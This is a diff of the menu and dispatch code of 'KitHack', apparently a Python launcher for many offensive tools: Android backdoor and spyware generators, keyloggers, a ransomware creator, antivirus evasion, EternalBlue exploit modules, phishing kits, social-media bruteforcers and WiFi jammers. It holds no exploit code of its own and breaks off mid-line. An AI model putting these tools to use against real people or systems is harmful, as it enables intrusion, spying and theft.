kitools.ReconNg() - - elif tool == '09': - kitools.theHarvester() - - elif tool == '10': - kitools.PhoneInfoga() - - elif tool == '11': - kitools.Gasmask() - - elif tool == '12': - kitools.URLextractor() - - elif tool == '13': - kitools.Devploit() - - elif tool == '14': - kitools.ReconDog() - - elif tool == '15': - kitools.Webkiller() - - elif tool == '16': - kitools.Quasar() - - elif tool == '17': - kitools.InfoInstagramIphone() - - elif tool == '18': - kitools.UserScan() - - elif tool == '19': - kitools.XCTRHackingTools() - - elif tool == '20': - kitools.DeadTrap() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '09': - os.system('clear') - print ('======{0}Tool{1}===================================================={0}Information{1}======================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Msfpc {2}Payload Generation Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Lazy {2}Script that automates many penetration processes.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} HTBINVITE {2}HTB Invite Generator.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ngrok {2}Local Reverse Proxy.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} A2sv {2}SSL Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Easysploit {2}Metasploit Automation Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} KnockMail {2}Email Validity Checker'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} Xerosploit {2}Penetration Testing Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} Slacksec {2}Basic Hacking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} Katana-Framework {2}Penetration Testing Framework.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}23){1} Onex {2}Hacking Tool Library.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}24){1} Ransom0 {2}Ransomware Creation Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}26){1} FBTOOL {2}Facebook Hacking Toolkit'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) +def main(): + print(start_main_menu) + option = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + option = option.zfill(2) + + if option == '01': + os.system('clear') + print('========={0}Tool{1}==================================={0}Information{1}================================'.format( + GREEN, DEFAULT)) + print('{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} Spade {2}APK Backdoor Tool Made in Python.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} AhMyth {2}Android Remote Administration Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} Kwetza {2}Inject malware into existing Android apps.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Termux {2}Linux based Android terminal emulator.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.BackdoorApk() + + elif tool == '02': + kitools.EvilDroid() + + elif tool == '03': + kitools.Spade() + + elif tool == '04': + kitools.AhMyth() + + elif tool == '05': + kitools.Andspoilt() + + elif tool == '06': + kitools.Kwetza() + + elif tool == '07': + kitools.Termux() + + elif tool == '08': + kitools.AndroidExploits() + + elif tool == '09': + kitools.Grabcam() + + elif tool == '10': + kitools.AndroidPatternLock() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '02': + os.system('clear') + print('========{0}Tool{1}================================================{0}Information{1}==================================='.format( + GREEN, DEFAULT)) + print('{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} sAINT {2}Spyware generator for Windows systems.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}08){1} DKMC {2}Malicious Payload Evasion Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}13){1} Windows-Exploits {2}Windows Exploits Collection.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.Winpayloads() + + elif tool == '02': + kitools.sAINT() + + elif tool == '03': + kitools.BeeLogger() + + elif tool == '04': + kitools.FakeImageExploiter() + + elif tool == '05': + kitools.Koadic() + + elif tool == '06': + kitools.PhantomEvasion() + + elif tool == '07': + kitools.Ps1encode() + + elif tool == '08': + kitools.DKMC() + + elif tool == '09': + kitools.Cromos() + + elif tool == '10': + kitools.EternalScanner() + + elif tool == '11': + kitools.EternalblueDoublepulsarMetasploit() + + elif tool == '12': + kitools.MS17010EternalBlueWinXPWin10() + + elif tool == '13': + kitools.WindowsExploits() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '03': + os.system('clear') + print('======={0}Tool{1}======================================={0}Information{1}====================================='.format( + GREEN, DEFAULT)) + print('{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} PhishX {2}Phishing and Spoofing Generator.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}04){1} SocialFish {2}Phishing educational tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} Spectre {2}Supports phishing attacks with almost any website.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Blackeye {2}Phishing tool with 38 websites available.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}08){1} PhEmail {2}Automate phishing email delivery processes.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Weeman {2}HTTP Server for Phishing.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} Zphisher {2}Automated phishing tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} AIOPhish {2}Phishing tool with different options.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.HiddenEye() + + elif tool == '02': + kitools.PhishX() + + elif tool == '03': + kitools.SocialPhish() + + elif tool == '04': + kitools.SocialFish() + + elif tool == '05': + kitools.PhisherMan() + + elif tool == '06': + kitools.Spectre() + + elif tool == '07': + kitools.Blackeye() + + elif tool == '08': + kitools.PhEmail() + + elif tool == '09': + kitools.Weeman() + + elif tool == '10': + kitools.Zphisher() + + elif tool == '11': + kitools.AIOPhish() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '04': + os.system('clear') + print('======={0}Tool{1}====================================={0}Information{1}======================================'.format( + GREEN, DEFAULT)) + print('{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. '.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} Wifite {2}Run existing wireless auditing tools for you.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .'.format(WHITE, YELLOW, DEFAULT)) + print( + '{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}12){1} Airgeddon {2}Bash script to audit wireless networks.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}13){1} Routersploit {2}Router Penetration Testing Modules.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}18){1} SniffAir {2}Wireless Pentesting Framework.'.format( + WHITE, YELLOW, DEFAULT)) + print( + '{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.Fluxion() + + elif tool == '02': + kitools.Wifiphisher() + + elif tool == '03': + kitools.Wifibroot() + + elif tool == '04': + kitools.Wifite() + + elif tool == '05': + kitools.Ettercap() + + elif tool == '06': + kitools.Linset() + + elif tool == '07': + kitools.WiFiPumpkin() + + elif tool == '08': + kitools.Wifresti() + + elif tool == '09': + kitools.EvilLimiter() + + elif tool == '10': + kitools.NetoolToolkit() + + elif tool == '11': + kitools.Dracnmap() + + elif tool == '12': + kitools.Airgeddon() + + elif tool == '13': + kitools.Routersploit() + + elif tool == '14': + kitools.Eaphammer() + + elif tool == '15': + kitools.VMRMDK() + + elif tool == '16': + kitools.Wirespy() + + elif tool == '17': + kitools.Wireshark() + + elif tool == '18': + kitools.SniffAir() + + elif tool == '19': + kitools.WifiJammer() + + elif tool == '20': + kitools.KawaiiDeauther() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '05': + os.system('clear') + print('======={0}Tool{1}====================================={0}Information{1}================================'.format( + GREEN, DEFAULT)) + print('{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} SocialBox {2}Bruteforce Framework.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} John The Ripper {2}Password Bruteforcing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Hashcat {2}Hash Cracking Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.'.format( + WHITE, YELLOW, DEFAULT)) + print( + '{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}11){1} Pupi {2}Password Generator Using Personal Information.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.Cupp() + + elif tool == '02': + kitools.Facebooker() + + elif tool == '03': + kitools.BluForceFB() + + elif tool == '04': + kitools.Brut3k1t() + + elif tool == '05': + kitools.SocialBox() + + elif tool == '06': + kitools.JohnTheRipper() + + elif tool == '07': + kitools.Hashcat() + + elif tool == '08': + kitools.Brutedum() + + elif tool == '09': + kitools.Facebash() + + elif tool == '10': + kitools.Brutespray() + + elif tool == '11': + kitools.Pupi() + + elif tool == '12': + kitools.B4rbrute() + + elif tool == '13': + kitools.FbHack() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '06': + os.system('clear') + print('======={0}Tool{1}========================================={0}Information{1}========================================'.format( + GREEN, DEFAULT)) + print('{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} XAttacker {2}Website Vulnerability Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}08){1} Joomscan {2}Website Misconfiguration Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Metagoofil {2}Metadata Extraction Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} WAFNinja {2}Web Application Firewall Attacker.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}13){1} XSStrike {2}Advanced XSS Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}14){1} LinksF1nd3r {2}Web Component Extractor.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.SQLmap() + + elif tool == '02': + kitools.XAttacker() + + elif tool == '03': + kitools.Fuxploider() + + elif tool == '04': + kitools.Wordpresscan() + + elif tool == '05': + kitools.SiteBroker() + + elif tool == '06': + kitools.NoSQLMap() + + elif tool == '07': + kitools.SqliScanner() + + elif tool == '08': + kitools.Joomscan() + + elif tool == '09': + kitools.Metagoofil() + + elif tool == '10': + kitools.Sublist3r() + + elif tool == '11': + kitools.WAFNinja() + + elif tool == '12': + kitools.Dirsearch() + + elif tool == '13': + kitools.XSStrike() + + elif tool == '14': + kitools.LinksF1nd3r() + + elif tool == '15': + kitools.DTECH() + + elif tool == '16': + kitools.Phpsploit() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '07': + os.system('clear') + print('======={0}Tool{1}====================================={0}Information{1}=================================='.format( + GREEN, DEFAULT)) + print('{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print( + '{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.'.format( + WHITE, YELLOW, DEFAULT)) + print( + '{0}06){1} GODKILLER {2}SMS Bomber/Sender.'.format(WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.SpoofMAC() + + elif tool == '02': + kitools.IpSpoofing() + + elif tool == '03': + kitools.Arpspoof() + + elif tool == '04': + kitools.DerpNSpoof() + + elif tool == '05': + kitools.DrSpoof() + + elif tool == '06': + kitools.GODKILLER() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '08': + os.system('clear') + print('========={0}Tool{1}========================================{0}Information{1}========================================'.format( + GREEN, DEFAULT)) + print('{0}01){1} NMAP {2}Network Scanning Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}02){1} Th3inspector {2}AIO Information Gathering Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} Infoga {2}Email Information Extraction Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.'.format( + WHITE, YELLOW, DEFAULT)) + print( + '{0}08){1} Recon-ng {2}Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool'.format(WHITE, YELLOW, DEFAULT)) + print('{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}15){1} Webkiller {2}Information Collection Kit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}16){1} Quasar {2}Information Collection Framework.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}20){1} DeadTrap {2}Phone Number OSINT Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.NMAP() + + elif tool == '02': + kitools.Th3inspector() + + elif tool == '03': + kitools.FBI() + + elif tool == '04': + kitools.Infoga() + + elif tool == '05': + kitools.Crips() + + elif tool == '06': + kitools.BillCipher() + + elif tool == '07': + kitools.RedHawk() + + elif tool == '08': + kitools.ReconNg() + + elif tool == '09': + kitools.theHarvester() + + elif tool == '10': + kitools.PhoneInfoga() + + elif tool == '11': + kitools.Gasmask() + + elif tool == '12': + kitools.URLextractor() + + elif tool == '13': + kitools.Devploit() + + elif tool == '14': + kitools.ReconDog() + + elif tool == '15': + kitools.Webkiller() + + elif tool == '16': + kitools.Quasar() + + elif tool == '17': + kitools.InfoInstagramIphone() + + elif tool == '18': + kitools.UserScan() + + elif tool == '19': + kitools.XCTRHackingTools() + + elif tool == '20': + kitools.DeadTrap() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '09': + os.system('clear') + print('======{0}Tool{1}===================================================={0}Information{1}======================================='.format( + GREEN, DEFAULT)) + print('{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}02){1} Msfpc {2}Payload Generation Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}05){1} Lazy {2}Script that automates many penetration processes.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}06){1} HTBINVITE {2}HTB Invite Generator.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}07){1} Ngrok {2}Local Reverse Proxy.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}10){1} A2sv {2}SSL Vulnerability Scanner.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}12){1} Easysploit {2}Metasploit Automation Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}14){1} KnockMail {2}Email Validity Checker'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}18){1} Xerosploit {2}Penetration Testing Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}19){1} Slacksec {2}Basic Hacking Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}20){1} Katana-Framework {2}Penetration Testing Framework.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}23){1} Onex {2}Hacking Tool Library.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}24){1} Ransom0 {2}Ransomware Creation Tool.'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.'.format(WHITE, YELLOW, DEFAULT)) + print('{0}26){1} FBTOOL {2}Facebook Hacking Toolkit'.format( + WHITE, YELLOW, DEFAULT)) + print('{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.'.format(WHITE, YELLOW, DEFAULT)) + print('{0} 0){1} Back'.format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == '00': + os.system('clear') + main() + + elif tool == '01': + kitools.TheFatRat() + + elif tool == '02': + kitools.Msfpc() + + elif tool == '03': + kitools.Fcrackzip() + + elif tool == '04': + kitools.QRLjacker() + + elif tool == '05': + kitools.Lazy() + + elif tool == '06': + kitools.HTBINVITE() + + elif tool == '07': + kitools.Ngrok() + + elif tool == '08': + kitools.Bluepot() + + elif tool == '09': + kitools.Setoolkit() + + elif tool == '10': + kitools.A2sv() + + elif tool == '11': + kitools.Fornonimizer() + + elif tool == '12': + kitools.Easysploit() + + elif tool == '13': + kitools.NXcrypt() + + elif tool == '14': + kitools.KnockMail() + + elif tool == '15': + kitools.RkHunter() + + elif tool == '16': + kitools.HeraKeylogger() + + elif tool == '17': + kitools.ZLogger() + + elif tool == '18': + kitools.Xerosploit() + + elif tool == '19': + kitools.Slacksec() + + elif tool == '20': + kitools.Katana() + + elif tool == '21': + kitools.Z0172CKTools() + + elif tool == '22': + kitools.CamHack() + + elif tool == '23': + kitools.Onex() + + elif tool == '24': + kitools.Ransom0() + + elif tool == '25': + kitools.Morpheus() + + elif tool == '26': + kitools.FBTOOL() + + elif tool == '27': + kitools.Venom() + + else: + print("\n{}[X] INVALID OPTION".format(RED)) + time.sleep(1.5) + os.system('clear') + main() + + elif option == '10': + # sys msfvenom + os.system('clear') + print(msf_banner) + print('\n{0} [*] {1}Sys Payloads:\n'.format(DEFAULT, GREEN)) + print('{0}[01] 